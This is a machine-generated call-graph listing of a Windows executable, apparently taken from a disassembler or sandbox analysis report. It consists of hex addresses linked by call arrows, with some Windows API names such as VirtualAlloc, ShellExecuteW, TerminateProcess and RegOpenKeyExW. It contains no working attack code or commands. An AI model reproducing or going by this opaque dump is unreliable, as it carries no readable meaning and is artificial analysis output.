96332->96243 96333->96243 96334->96243 96335->96243 96337 6d7525 96336->96337 96354 6d7522 96336->96354 96338 6d752d 96337->96338 96339 6d755b 96337->96339 96361 6f51c6 26 API calls 96338->96361 96341 6d756d 96339->96341 96346 71500f 96339->96346 96349 7150f6 96339->96349 96362 6efb21 51 API calls 96341->96362 96344 6d753d 96348 6efddb 22 API calls 96344->96348 96345 71510e 96345->96345 96352 715088 96346->96352 96353 6efe0b 22 API calls 96346->96353 96350 6d7547 96348->96350 96364 6f5183 26 API calls 96349->96364 96351 6d9cb3 22 API calls 96350->96351 96351->96354 96363 6efb21 51 API calls 96352->96363 96356 715058 96353->96356 96354->96268 96355 6efddb 22 API calls 96357 71507f 96355->96357 96356->96355 96358 6d9cb3 22 API calls 96357->96358 96358->96352 96359->96268 96360->96265 96361->96344 96362->96344 96363->96349 96364->96345 96366 73ebe0 _strlen 96365->96366 96367 73ec37 96365->96367 96368 73ebef MultiByteToWideChar 96366->96368 96372 6d9c6e 96367->96372 96368->96367 96369 73ec04 96368->96369 96370 6efe0b 22 API calls 96369->96370 96371 73ec20 MultiByteToWideChar 96370->96371 96371->96367 96373 6d9c7e 96372->96373 96374 71f545 96372->96374 96379 6efddb 22 API calls 96373->96379 96375 71f556 96374->96375 96377 6d6b57 22 API calls 96374->96377 96376 6da6c3 22 API calls 96375->96376 96378 71f560 96376->96378 96377->96375 96378->96378 96380 6d9c91 96379->96380 96381 6d9cac 96380->96381 96382 6d9c9a 96380->96382 96384 6da961 22 API calls 96381->96384 96383 6d9cb3 22 API calls 96382->96383 96385 6d9ca2 96383->96385 96384->96385 96385->96325 96387 6d6d34 96386->96387 96388 6d6d91 96386->96388 96387->96388 96389 6d6d3f 96387->96389 96390 6d93b2 22 API calls 96388->96390 96392 6d6d5a 96389->96392 96393 714c9d 96389->96393 96391 6d6d62 __fread_nolock 96390->96391 96391->96317 96410 6d6f34 22 API calls 96392->96410 96394 6efddb 22 API calls 96393->96394 96396 714ca7 96394->96396 96397 6efe0b 22 API calls 96396->96397 96398 714cda 96397->96398 96399->96322 96400->96325 96401->96325 96402->96296 96403->96313 96404->96320 96406 6daec9 22 API calls 96405->96406 96407 6d4c78 96406->96407 96407->96325 96408->96306 96409->96325 96410->96391 96412 6da961 22 API calls 96411->96412 96413 6d5275 96412->96413 96414 6da961 22 API calls 96413->96414 96415 6d527d 96414->96415 96416 6da961 22 API calls 96415->96416 96417 6d5285 96416->96417 96418 6da961 22 API calls 96417->96418 96419 6d528d 96418->96419 96420 713df5 96419->96420 96421 6d52c1 96419->96421 96422 6da8c7 22 API calls 96420->96422 96423 6d6d25 22 API calls 96421->96423 96424 713dfe 96422->96424 96425 6d52cf 96423->96425 96426 6da6c3 22 API calls 96424->96426 96427 6d93b2 22 API calls 96425->96427 96429 6d5304 96426->96429 96428 6d52d9 96427->96428 96428->96429 96431 6d6d25 22 API calls 96428->96431 96430 6d5349 96429->96430 96432 6d5325 96429->96432 96449 713e20 96429->96449 96433 6d6d25 22 API calls 96430->96433 96434 6d52fa 96431->96434 96432->96430 96437 6d4c6d 22 API calls 96432->96437 96436 6d535a 96433->96436 96435 6d93b2 22 API calls 96434->96435 96435->96429 96438 6d5370 96436->96438 96442 6da8c7 22 API calls 96436->96442 96440 6d5332 96437->96440 96439 6d5384 96438->96439 96444 6da8c7 22 API calls 96438->96444 96443 6d538f 96439->96443 96446 6da8c7 22 API calls 96439->96446 96440->96430 96445 6d6d25 22 API calls 96440->96445 96441 6d6b57 22 API calls 96450 713ee0 96441->96450 96442->96438 96447 6da8c7 22 API calls 96443->96447 96451 6d539a 96443->96451 96444->96439 96445->96430 96446->96443 96447->96451 96448 6d4c6d 22 API calls 96448->96450 96449->96441 96450->96430 96450->96448 96583 6d49bd 22 API calls __fread_nolock 96450->96583 96451->96163 96454 714a51 96453->96454 96455 6d6362 96453->96455 96594 6d4a88 22 API calls __fread_nolock 96454->96594 96584 6d6373 96455->96584 96458 6d636e 96458->96176 96459 714a5b 96460 6da8c7 22 API calls 96459->96460 96461 714a67 96459->96461 96460->96461 96463 73d7d8 96462->96463 96464 73d7f3 96463->96464 96465 73d7dd 96463->96465 96466 6da961 22 API calls 96464->96466 96467 6da8c7 22 API calls 96465->96467 96515 73d7ee 96465->96515 96468 73d7fb 96466->96468 96467->96515 96469 6da961 22 API calls 96468->96469 96470 73d803 96469->96470 96471 6da961 22 API calls 96470->96471 96472 73d80e 96471->96472 96473 6da961 22 API calls 96472->96473 96474 73d816 96473->96474 96475 6da961 22 API calls 96474->96475 96476 73d81e 96475->96476 96477 6da961 22 API calls 96476->96477 96478 73d826 96477->96478 96479 6da961 22 API calls 96478->96479 96480 73d82e 96479->96480 96481 6da961 22 API calls 96480->96481 96482 73d836 96481->96482 96483 6d525f 22 API calls 96482->96483 96484 73d84d 96483->96484 96485 6d525f 22 API calls 96484->96485 96486 73d866 96485->96486 96487 6d4c6d 22 API calls 96486->96487 96488 73d872 96487->96488 96489 73d885 96488->96489 96490 6d93b2 22 API calls 96488->96490 96491 6d4c6d 22 API calls 96489->96491 96490->96489 96492 73d88e 96491->96492 96493 73d89e 96492->96493 96494 6d93b2 22 API calls 96492->96494 96495 73d8b0 96493->96495 96496 6da8c7 22 API calls 96493->96496 96494->96493 96497 6d6350 22 API calls 96495->96497 96496->96495 96498 73d8bb 96497->96498 96600 73d978 22 API calls 96498->96600 96500 73d8ca 96601 73d978 22 API calls 96500->96601 96502 73d8dd 96503 6d4c6d 22 API calls 96502->96503 96504 73d8e7 96503->96504 96505 73d8fe 96504->96505 96506 73d8ec 96504->96506 96508 6d4c6d 22 API calls 96505->96508 96507 6d33c6 22 API calls 96506->96507 96510 73d8f9 96507->96510 96509 73d907 96508->96509 96511 73d925 96509->96511 96512 6d33c6 22 API calls 96509->96512 96513 6d6350 22 API calls 96510->96513 96514 6d6350 22 API calls 96511->96514 96512->96510 96513->96511 96514->96515 96515->96184 96517 742954 __wsopen_s 96516->96517 96518 6efe0b 22 API calls 96517->96518 96519 742971 96518->96519 96520 6d5722 22 API calls 96519->96520 96521 74297b 96520->96521 96522 74274e 27 API calls 96521->96522 96523 742986 96522->96523 96524 6d511f 64 API calls 96523->96524 96525 74299b 96524->96525 96526 742a6c 96525->96526 96527 7429bf 96525->96527 96528 742e66 75 API calls 96526->96528 96529 742e66 75 API calls 96527->96529 96544 742a38 96528->96544 96530 7429c4 96529->96530 96535 742a75 ISource 96530->96535 96606 6fd583 26 API calls 96530->96606 96532 6d50f5 40 API calls 96533 742a91 96532->96533 96534 6d50f5 40 API calls 96533->96534 96537 742aa1 96534->96537 96535->96191 96536 7429ed 96607 6fd583 26 API calls 96536->96607 96538 6d50f5 40 API calls 96537->96538 96540 742abc 96538->96540 96541 6d50f5 40 API calls 96540->96541 96542 742acc 96541->96542 96543 6d50f5 40 API calls 96542->96543 96545 742ae7 96543->96545 96544->96532 96544->96535 96546 6d50f5 40 API calls 96545->96546 96547 742af7 96546->96547 96548 6d50f5 40 API calls 96547->96548 96549 742b07 96548->96549 96550 6d50f5 40 API calls 96549->96550 96551 742b17 96550->96551 96602 743017 GetTempPathW GetTempFileNameW 96551->96602 96553 742b22 96554 6fe5eb 29 API calls 96553->96554 96555 742b33 96554->96555 96555->96535 96558 6d50f5 40 API calls 96555->96558 96565 6fdbb3 65 API calls 96555->96565 96567 742bed 96555->96567 96556 6fe678 67 API calls 96557 742bf8 96556->96557 96559 742c12 96557->96559 96560 742bfe DeleteFileW 96557->96560 96558->96555 96560->96535 96565->96555 96567->96556 96571->96118 96573 6d33dd 96572->96573 96574 7130bb 96572->96574 96608 6d33ee 96573->96608 96576 6efddb 22 API calls 96574->96576 96578 7130c5 _wcslen 96576->96578 96577 6d33e8 96577->96146 96579 6efe0b 22 API calls 96578->96579 96580 7130fe __fread_nolock 96579->96580 96581->96151 96582->96164 96583->96450 96586 6d6382 96584->96586 96591 6d63b6 __fread_nolock 96584->96591 96585 714a82 96588 6efddb 22 API calls 96585->96588 96586->96585 96587 6d63a9 96586->96587 96586->96591 96595 6da587 96587->96595 96590 714a91 96588->96590 96592 6efe0b 22 API calls 96590->96592 96591->96458 96593 714ac5 __fread_nolock 96592->96593 96594->96459 96596 6da59d 96595->96596 96599 6da598 __fread_nolock 96595->96599 96597 6efe0b 22 API calls 96596->96597 96598 71f80f 96596->96598 96597->96599 96599->96591 96600->96500 96601->96502 96602->96553 96606->96536 96607->96544 96609 6d33fe _wcslen 96608->96609 96610 71311d 96609->96610 96611 6d3411 96609->96611 96613 6efddb 22 API calls 96610->96613 96612 6da587 22 API calls 96611->96612 96614 6d341e __fread_nolock 96612->96614 96615 713127 96613->96615 96614->96577 96616 6efe0b 22 API calls 96615->96616 96617 713157 __fread_nolock 96616->96617 96619 6d7510 53 API calls 96618->96619 96620 757f90 96619->96620 96636 757fd5 ISource 96620->96636 96656 758cd3 96620->96656 96622 75844f 96697 758ee4 60 API calls 96622->96697 96625 75845e 96627 75828f 96625->96627 96628 75846a 96625->96628 96626 758049 96629 6d7510 53 API calls 96626->96629 96626->96636 96643 758281 96626->96643 96688 73417d 22 API calls __fread_nolock 96626->96688 96689 75851d 42 API calls _strftime 96626->96689 96669 757e86 96627->96669 96628->96636 96629->96626 96634 7582c8 96684 6efc70 96634->96684 96636->96195 96638 758302 96691 6d63eb 22 API calls 96638->96691 96639 7582e8 96690 74359c 82 API calls __wsopen_s 96639->96690 96642 7582f3 GetCurrentProcess TerminateProcess 96642->96638 96643->96622 96643->96627 96644 758311 96692 6d6a50 22 API calls 96644->96692 96646 75832a 96654 758352 96646->96654 96693 6e04f0 22 API calls 96646->96693 96647 7584c5 96647->96636 96651 7584d9 FreeLibrary 96647->96651 96649 758341 96694 758b7b 75 API calls 96649->96694 96651->96636 96654->96647 96695 6e04f0 22 API calls 96654->96695 96696 6daceb 23 API calls ISource 96654->96696 96698 758b7b 75 API calls 96654->96698 96657 6daec9 22 API calls 96656->96657 96658 758cee CharLowerBuffW 96657->96658 96699 738e54 96658->96699 96662 6da961 22 API calls 96663 758d2a 96662->96663 96664 6d6d25 22 API calls 96663->96664 96665 758d3e 96664->96665 96666 6d93b2 22 API calls 96665->96666 96668 758d48 _wcslen 96666->96668 96667 758e5e _wcslen 96667->96626 96668->96667 96706 75851d 42 API calls _strftime 96668->96706 96670 757ea1 96669->96670 96674 757eec 96669->96674 96671 6efe0b 22 API calls 96670->96671 96672 757ec3 96671->96672 96673 6efddb 22 API calls 96672->96673 96672->96674 96673->96672 96675 759096 96674->96675 96676 7592ab ISource 96675->96676 96683 7590ba _strcat _wcslen 96675->96683 96676->96634 96677 6db567 39 API calls 96677->96683 96678 6db38f 39 API calls 96678->96683 96679 6db6b5 39 API calls 96679->96683 96680 6d7510 53 API calls 96680->96683 96681 6fea0c 21 API calls ___std_exception_copy 96681->96683 96683->96676 96683->96677 96683->96678 96683->96679 96683->96680 96683->96681 96709 73efae 24 API calls _wcslen 96683->96709 96685 6efc85 96684->96685 96686 6efd1d VirtualAlloc 96685->96686 96687 6efceb 96685->96687 96686->96687 96687->96638 96687->96639 96688->96626 96689->96626 96690->96642 96691->96644 96692->96646 96693->96649 96694->96654 96695->96654 96696->96654 96697->96625 96698->96654 96700 738e74 _wcslen 96699->96700 96701 738f63 96700->96701 96704 738ea9 96700->96704 96705 738f68 96700->96705 96701->96662 96701->96668 96704->96701 96707 6ece60 41 API calls 96704->96707 96705->96701 96708 6ece60 41 API calls 96705->96708 96706->96667 96707->96704 96708->96705 96709->96683 96738 6d6270 96710->96738 96712 6d9fd2 96713 6da4a1 22 API calls 96712->96713 96714 6d9fec 96713->96714 96714->96200 96717 71f7c4 96748 7396e2 84 API calls __wsopen_s 96717->96748 96718 71f699 96726 6efddb 22 API calls 96718->96726 96720 6da405 96720->96714 96749 7396e2 84 API calls __wsopen_s 96720->96749 96721 6da4a1 22 API calls 96737 6d9eb5 96721->96737 96724 6da6c3 22 API calls 96724->96737 96725 71f7d2 96727 6da4a1 22 API calls 96725->96727 96728 71f754 96726->96728 96729 71f7e8 96727->96729 96730 6efe0b 22 API calls 96728->96730 96729->96714 96731 6da12c __fread_nolock 96730->96731 96731->96717 96731->96720 96733 6da587 22 API calls 96733->96737 96734 6daec9 22 API calls 96735 6da0db CharUpperBuffW 96734->96735 96744 6da673 22 API calls 96735->96744 96737->96712 96737->96717 96737->96718 96737->96720 96737->96721 96737->96724 96737->96731 96737->96733 96737->96734 96743 6d4573 41 API calls _wcslen 96737->96743 96745 6d48c8 23 API calls 96737->96745 96746 6d49bd 22 API calls __fread_nolock 96737->96746 96747 6da673 22 API calls 96737->96747 96739 6efe0b 22 API calls 96738->96739 96740 6d6295 96739->96740 96741 6efddb 22 API calls 96740->96741 96742 6d62a3 96741->96742 96742->96737 96743->96737 96744->96737 96745->96737 96746->96737 96747->96737 96748->96725 96749->96714 96751 73d4d5 96750->96751 96752 73dbdc GetFileAttributesW 96750->96752 96751->96075 96752->96751 96753 73dbe8 FindFirstFileW 96752->96753 96753->96751 96754 73dbf9 FindClose 96753->96754 96754->96751 96755 708402 96760 7081be 96755->96760 96758 70842a 96765 7081ef try_get_first_available_module 96760->96765 96762 7083ee 96779 7027ec 26 API calls __fread_nolock 96762->96779 96764 708343 96764->96758 96772 710984 96764->96772 96768 708338 96765->96768 96775 6f8e0b 40 API calls 2 library calls 96765->96775 96767 70838c 96767->96768 96776 6f8e0b 40 API calls 2 library calls 96767->96776 96768->96764 96778 6ff2d9 20 API calls __dosmaperr 96768->96778 96770 7083ab 96770->96768 96777 6f8e0b 40 API calls 2 library calls 96770->96777 96780 710081 96772->96780 96774 71099f 96774->96758 96775->96767 96776->96770 96777->96768 96778->96762 96779->96764 96783 71008d ___scrt_is_nonwritable_in_current_image 96780->96783 96781 71009b 96838 6ff2d9 20 API calls __dosmaperr 96781->96838 96783->96781 96785 7100d4 96783->96785 96784 7100a0 96839 7027ec 26 API calls __fread_nolock 96784->96839 96791 71065b 96785->96791 96790 7100aa __fread_nolock 96790->96774 96841 71042f 96791->96841 96794 7106a6 96859 705221 96794->96859 96795 71068d 96873 6ff2c6 20 API calls __dosmaperr 96795->96873 96798 710692 96874 6ff2d9 20 API calls __dosmaperr 96798->96874 96799 7106ab 96800 7106b4 96799->96800 96801 7106cb 96799->96801 96875 6ff2c6 20 API calls __dosmaperr 96800->96875 96872 71039a CreateFileW 96801->96872 96805 7106b9 96876 6ff2d9 20 API calls __dosmaperr 96805->96876 96806 710781 GetFileType 96809 7107d3 96806->96809 96810 71078c GetLastError 96806->96810 96808 710756 GetLastError 96878 6ff2a3 20 API calls 2 library calls 96808->96878 96881 70516a 21 API calls 3 library calls 96809->96881 96879 6ff2a3 20 API calls 2 library calls 96810->96879 96811 710704 96811->96806 96811->96808 96877 71039a CreateFileW 96811->96877 96815 71079a CloseHandle 96815->96798 96818 7107c3 96815->96818 96817 710749 96817->96806 96817->96808 96880 6ff2d9 20 API calls __dosmaperr 96818->96880 96820 7107f4 96824 710840 96820->96824 96882 7105ab 72 API calls 4 library calls 96820->96882 96821 7107c8 96821->96798 96826 71086d 96824->96826 96883 71014d 72 API calls 4 library calls 96824->96883 96825 710866 96825->96826 96827 71087e 96825->96827 96828 7086ae __wsopen_s 29 API calls 96826->96828 96829 7100f8 96827->96829 96830 7108fc CloseHandle 96827->96830 96828->96829 96840 710121 LeaveCriticalSection __wsopen_s 96829->96840 96884 71039a CreateFileW 96830->96884 96832 710927 96833 710931 GetLastError 96832->96833 96834 71095d 96832->96834 96885 6ff2a3 20 API calls 2 library calls 96833->96885 96834->96829 96836 71093d 96886 705333 21 API calls 3 library calls 96836->96886 96838->96784 96839->96790 96840->96790 96842 710450 96841->96842 96849 71046a 96841->96849 96842->96849 96894 6ff2d9 20 API calls __dosmaperr 96842->96894 96845 71045f 96895 7027ec 26 API calls __fread_nolock 96845->96895 96847 7104d1 96856 710524 96847->96856 96898 6fd70d 26 API calls 2 library calls 96847->96898 96848 7104a2 96848->96847 96896 6ff2d9 20 API calls __dosmaperr 96848->96896 96887 7103bf 96849->96887 96852 71051f 96854 71059e 96852->96854 96852->96856 96853 7104c6 96897 7027ec 26 API calls __fread_nolock 96853->96897 96899 7027fc 11 API calls _abort 96854->96899 96856->96794 96856->96795 96858 7105aa 96860 70522d ___scrt_is_nonwritable_in_current_image 96859->96860 96902 702f5e EnterCriticalSection 96860->96902 96862 70527b 96903 70532a 96862->96903 96864 705259 96906 705000 96864->96906 96865 705234 96865->96862 96865->96864 96869 7052c7 EnterCriticalSection 96865->96869 96866 7052a4 __fread_nolock 96866->96799 96869->96862 96870 7052d4 LeaveCriticalSection 96869->96870 96870->96865 96872->96811 96873->96798 96874->96829 96875->96805 96876->96798 96877->96817 96878->96798 96879->96815 96880->96821 96881->96820 96882->96824 96883->96825 96884->96832 96885->96836 96886->96834 96889 7103d7 96887->96889 96888 7103f2 96888->96848 96889->96888 96900 6ff2d9 20 API calls __dosmaperr 96889->96900 96891 710416 96901 7027ec 26 API calls __fread_nolock 96891->96901 96893 710421 96893->96848 96894->96845 96895->96849 96896->96853 96897->96847 96898->96852 96899->96858 96900->96891 96901->96893 96902->96865 96914 702fa6 LeaveCriticalSection 96903->96914 96905 705331 96905->96866 96907 704c7d __dosmaperr 20 API calls 96906->96907 96908 705012 96907->96908 96912 70501f 96908->96912 96915 703405 11 API calls 2 library calls 96908->96915 96909 7029c8 _free 20 API calls 96911 705071 96909->96911 96911->96862 96913 705147 EnterCriticalSection 96911->96913 96912->96909 96913->96862 96914->96905 96915->96908 96916 6df7bf 96917 6dfcb6 96916->96917 96918 6df7d3 96916->96918 96952 6daceb 23 API calls ISource 96917->96952 96920 6dfcc2 96918->96920 96921 6efddb 22 API calls 96918->96921 96953 6daceb 23 API calls ISource 96920->96953 96923 6df7e5 96921->96923 96923->96920 96924 6df83e 96923->96924 96925 6dfd3d 96923->96925 96927 6e1310 235 API calls 96924->96927 96949 6ded9d ISource 96924->96949 96954 741155 22 API calls 96925->96954 96948 6dec76 ISource 96927->96948 96928 6efddb 22 API calls 96928->96948 96929 6e06a0 41 API calls 96929->96948 96930 6dfef7 96934 6da8c7 22 API calls 96930->96934 96930->96949 96932 724600 96937 6da8c7 22 API calls 96932->96937 96932->96949 96933 724b0b 96956 74359c 82 API calls __wsopen_s 96933->96956 96934->96949 96937->96949 96939 6da8c7 22 API calls 96939->96948 96940 6f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96940->96948 96941 6dfbe3 96943 724bdc 96941->96943 96941->96949 96950 6df3ae ISource 96941->96950 96942 6da961 22 API calls 96942->96948 96957 74359c 82 API calls __wsopen_s 96943->96957 96945 724beb 96958 74359c 82 API calls __wsopen_s 96945->96958 96946 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96946->96948 96947 6f00a3 29 API calls pre_c_initialization 96947->96948 96948->96928 96948->96929 96948->96930 96948->96932 96948->96933 96948->96939 96948->96940 96948->96941 96948->96942 96948->96945 96948->96946 96948->96947 96948->96949 96948->96950 96951 6e01e0 235 API calls 2 library calls 96948->96951 96950->96949 96955 74359c 82 API calls __wsopen_s 96950->96955 96951->96948 96952->96920 96953->96925 96954->96949 96955->96949 96956->96949 96957->96945 96958->96949 96959 6e0b9d 96968 6e0ba6 __fread_nolock 96959->96968 96960 6d7510 53 API calls 96960->96968 96961 725cb8 96971 6d4a88 22 API calls __fread_nolock 96961->96971 96963 725cc4 96967 6da8c7 22 API calls 96963->96967 96969 6e0847 __fread_nolock 96963->96969 96964 6e0bf7 96966 6da587 22 API calls 96964->96966 96965 6efddb 22 API calls 96965->96968 96966->96969 96967->96969 96968->96960 96968->96961 96968->96964 96968->96965 96968->96969 96970 6efe0b 22 API calls 96968->96970 96970->96968 96971->96963 96972 6f03fb 96973 6f0407 ___scrt_is_nonwritable_in_current_image 96972->96973 97001 6efeb1 96973->97001 96975 6f040e 96976 6f0561 96975->96976 96979 6f0438 96975->96979 97028 6f083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96976->97028 96978 6f0568 97029 6f4e52 28 API calls _abort 96978->97029 96990 6f0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96979->96990 97012 70247d 96979->97012 96981 6f056e 97030 6f4e04 28 API calls _abort 96981->97030 96985 6f0576 96986 6f0457 96988 6f04d8 97020 6f0959 96988->97020 96990->96988 97024 6f4e1a 38 API calls 3 library calls 96990->97024 96992 6f04de 96993 6f04f3 96992->96993 97025 6f0992 GetModuleHandleW 96993->97025 96995 6f04fa 96995->96978 96996 6f04fe 96995->96996 96997 6f0507 96996->96997 97026 6f4df5 28 API calls _abort 96996->97026 97027 6f0040 13 API calls 2 library calls 96997->97027 97000 6f050f 97000->96986 97002 6efeba 97001->97002 97031 6f0698 IsProcessorFeaturePresent 97002->97031 97004 6efec6 97032 6f2c94 10 API calls 3 library calls 97004->97032 97006 6efecb 97011 6efecf 97006->97011 97033 702317 97006->97033 97009 6efee6 97009->96975 97011->96975 97014 702494 97012->97014 97013 6f0a8c CatchGuardHandler 5 API calls 97015 6f0451 97013->97015 97014->97013 97015->96986 97016 702421 97015->97016 97017 702450 97016->97017 97018 6f0a8c CatchGuardHandler 5 API calls 97017->97018 97019 702479 97018->97019 97019->96990 97076 6f2340 97020->97076 97023 6f097f 97023->96992 97024->96988 97025->96995 97026->96997 97027->97000 97028->96978 97029->96981 97030->96985 97031->97004 97032->97006 97037 70d1f6 97033->97037 97036 6f2cbd 8 API calls 3 library calls 97036->97011 97040 70d213 97037->97040 97041 70d20f 97037->97041 97038 6f0a8c CatchGuardHandler 5 API calls 97039 6efed8 97038->97039 97039->97009 97039->97036 97040->97041 97043 704bfb 97040->97043 97041->97038 97044 704c07 ___scrt_is_nonwritable_in_current_image 97043->97044 97055 702f5e EnterCriticalSection 97044->97055 97046 704c0e 97056 7050af 97046->97056 97048 704c1d 97054 704c2c 97048->97054 97069 704a8f 29 API calls 97048->97069 97051 704c27 97070 704b45 GetStdHandle GetFileType 97051->97070 97052 704c3d __fread_nolock 97052->97040 97071 704c48 LeaveCriticalSection _abort 97054->97071 97055->97046 97057 7050bb ___scrt_is_nonwritable_in_current_image 97056->97057 97058 7050c8 97057->97058 97059 7050df 97057->97059 97073 6ff2d9 20 API calls __dosmaperr 97058->97073 97072 702f5e EnterCriticalSection 97059->97072 97062 7050cd 97074 7027ec 26 API calls __fread_nolock 97062->97074 97064 705117 97075 70513e LeaveCriticalSection _abort 97064->97075 97065 7050d7 __fread_nolock 97065->97048 97066 7050eb 97066->97064 97068 705000 __wsopen_s 21 API calls 97066->97068 97068->97066 97069->97051 97070->97054 97071->97052 97072->97066 97073->97062 97074->97065 97075->97065 97077 6f096c GetStartupInfoW 97076->97077 97077->97023 97078 712ba5 97079 6d2b25 97078->97079 97080 712baf 97078->97080 97106 6d2b83 7 API calls 97079->97106 97121 6d3a5a 97080->97121 97084 712bb8 97086 6d9cb3 22 API calls 97084->97086 97088 712bc6 97086->97088 97087 6d2b2f 97089 6d2b44 97087->97089 97110 6d3837 97087->97110 97090 712bf5 97088->97090 97091 712bce 97088->97091 97097 6d2b5f 97089->97097 97120 6d30f2 Shell_NotifyIconW ___scrt_fastfail 97089->97120 97092 6d33c6 22 API calls 97090->97092 97094 6d33c6 22 API calls 97091->97094 97105 712bf1 GetForegroundWindow ShellExecuteW 97092->97105 97095 712bd9 97094->97095 97098 6d6350 22 API calls 97095->97098 97102 6d2b66 SetCurrentDirectoryW 97097->97102 97101 712be7 97098->97101 97099 712c26 97099->97097 97103 6d33c6 22 API calls 97101->97103 97104 6d2b7a 97102->97104 97103->97105 97105->97099 97128 6d2cd4 7 API calls 97106->97128 97108 6d2b2a 97109 6d2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97108->97109 97109->97087 97111 6d3862 ___scrt_fastfail 97110->97111 97129 6d4212 97111->97129 97114 6d38e8 97116 713386 Shell_NotifyIconW 97114->97116 97117 6d3906 Shell_NotifyIconW 97114->97117 97133 6d3923 97117->97133 97119 6d391c 97119->97089 97120->97097 97122 711f50 __wsopen_s 97121->97122 97123 6d3a67 GetModuleFileNameW 97122->97123 97124 6d9cb3 22 API calls 97123->97124 97125 6d3a8d 97124->97125 97126 6d3aa2 23 API calls 97125->97126 97127 6d3a97 97126->97127 97127->97084 97128->97108 97130 7135a4 97129->97130 97131 6d38b7 97129->97131 97130->97131 97132 7135ad DestroyIcon 97130->97132 97131->97114 97155 73c874 42 API calls _strftime 97131->97155 97132->97131 97134 6d393f 97133->97134 97135 6d3a13 97133->97135 97136 6d6270 22 API calls 97134->97136 97135->97119 97137 6d394d 97136->97137 97138 713393 LoadStringW 97137->97138 97139 6d395a 97137->97139 97141 7133ad 97138->97141 97140 6d6b57 22 API calls 97139->97140 97142 6d396f 97140->97142 97145 6da8c7 22 API calls 97141->97145 97149 6d3994 ___scrt_fastfail 97141->97149 97143 6d397c 97142->97143 97144 7133c9 97142->97144 97143->97141 97146 6d3986 97143->97146 97147 6d6350 22 API calls 97144->97147 97145->97149 97148 6d6350 22 API calls 97146->97148 97150 7133d7 97147->97150 97148->97149 97152 6d39f9 Shell_NotifyIconW 97149->97152 97150->97149 97151 6d33c6 22 API calls 97150->97151 97153 7133f9 97151->97153 97152->97135 97154 6d33c6 22 API calls 97153->97154 97154->97149 97155->97114 97156 6d1098 97161 6d42de 97156->97161 97160 6d10a7 97162 6da961 22 API calls 97161->97162 97163 6d42f5 GetVersionExW 97162->97163 97164 6d6b57 22 API calls 97163->97164 97165 6d4342 97164->97165 97166 6d4378 97165->97166 97167 6d93b2 22 API calls 97165->97167 97169 6d441b GetCurrentProcess IsWow64Process 97166->97169 97176 7137df 97166->97176 97168 6d436c 97167->97168 97170 6d37a0 22 API calls 97168->97170 97171 6d4437 97169->97171 97170->97166 97172 6d444f LoadLibraryA 97171->97172 97173 713824 GetSystemInfo 97171->97173 97174 6d449c GetSystemInfo 97172->97174 97175 6d4460 GetProcAddress 97172->97175 97178 6d4476 97174->97178 97175->97174 97177 6d4470 GetNativeSystemInfo 97175->97177 97177->97178 97179 6d447a FreeLibrary 97178->97179 97180 6d109d 97178->97180 97179->97180 97181 6f00a3 29 API calls __onexit 97180->97181 97181->97160 97182 6d105b 97187 6d344d 97182->97187 97184 6d106a 97218 6f00a3 29 API calls __onexit 97184->97218 97186 6d1074 97188 6d345d __wsopen_s 97187->97188 97189 6da961 22 API calls 97188->97189 97190 6d3513 97189->97190 97191 6d3a5a 24 API calls 97190->97191 97192 6d351c 97191->97192 97219 6d3357 97192->97219 97195 6d33c6 22 API calls 97196 6d3535 97195->97196 97197 6d515f 22 API calls 97196->97197 97198 6d3544 97197->97198 97199 6da961 22 API calls 97198->97199 97200 6d354d 97199->97200 97201 6da6c3 22 API calls 97200->97201 97202 6d3556 RegOpenKeyExW 97201->97202 97203 713176 RegQueryValueExW 97202->97203 97208 6d3578 97202->97208 97204 713193 97203->97204 97205 71320c RegCloseKey 97203->97205 97206 6efe0b 22 API calls 97204->97206 97205->97208 97217 71321e _wcslen 97205->97217 97207 7131ac 97206->97207 97209 6d5722 22 API calls 97207->97209 97208->97184 97210 7131b7 RegQueryValueExW 97209->97210 97212 7131d4 97210->97212 97214 7131ee ISource 97210->97214 97211 6d4c6d 22 API calls 97211->97217 97213 6d6b57 22 API calls 97212->97213 97213->97214 97214->97205 97215 6d9cb3 22 API calls 97215->97217 97216 6d515f 22 API calls 97216->97217 97217->97208 97217->97211 97217->97215 97217->97216 97218->97186 97220 711f50 __wsopen_s 97219->97220 97221 6d3364 GetFullPathNameW 97220->97221 97222 6d3386 97221->97222 97223 6d6b57 22 API calls 97222->97223 97224 6d33a4 97223->97224 97224->97195 97225 6d2e37 97226 6da961 22 API calls 97225->97226 97227 6d2e4d 97226->97227 97304 6d4ae3 97227->97304 97229 6d2e6b 97230 6d3a5a 24 API calls 97229->97230 97231 6d2e7f 97230->97231 97232 6d9cb3 22 API calls 97231->97232 97233 6d2e8c 97232->97233 97234 6d4ecb 94 API calls 97233->97234 97235 6d2ea5 97234->97235 97236 6d2ead 97235->97236 97237 712cb0 97235->97237 97241 6da8c7 22 API calls 97236->97241 97238 742cf9 80 API calls 97237->97238 97239 712cc3 97238->97239 97240 712ccf 97239->97240 97242 6d4f39 68 API calls 97239->97242 97245 6d4f39 68 API calls 97240->97245 97243 6d2ec3 97241->97243 97242->97240 97318 6d6f88 22 API calls 97243->97318 97247 712ce5 97245->97247 97246 6d2ecf 97248 6d9cb3 22 API calls 97246->97248 97334 6d3084 22 API calls 97247->97334 97249 6d2edc 97248->97249 97319 6da81b 41 API calls 97249->97319 97251 6d2eec 97254 6d9cb3 22 API calls 97251->97254 97253 712d02 97335 6d3084 22 API calls 97253->97335 97256 6d2f12 97254->97256 97320 6da81b 41 API calls 97256->97320 97257 712d1e 97259 6d3a5a 24 API calls 97257->97259 97260 712d44 97259->97260 97336 6d3084 22 API calls 97260->97336 97261 6d2f21 97264 6da961 22 API calls 97261->97264 97263 712d50 97265 6da8c7 22 API calls 97263->97265 97266 6d2f3f 97264->97266 97267 712d5e 97265->97267 97321 6d3084 22 API calls 97266->97321 97337 6d3084 22 API calls 97267->97337 97269 6d2f4b 97322 6f4a28 40 API calls 3 library calls 97269->97322 97272 712d6d 97276 6da8c7 22 API calls 97272->97276 97273 6d2f59 97273->97247 97274 6d2f63 97273->97274 97323 6f4a28 40 API calls 3 library calls 97274->97323 97277 712d83 97276->97277 97338 6d3084 22 API calls 97277->97338 97278 6d2f6e 97278->97253 97280 6d2f78 97278->97280 97324 6f4a28 40 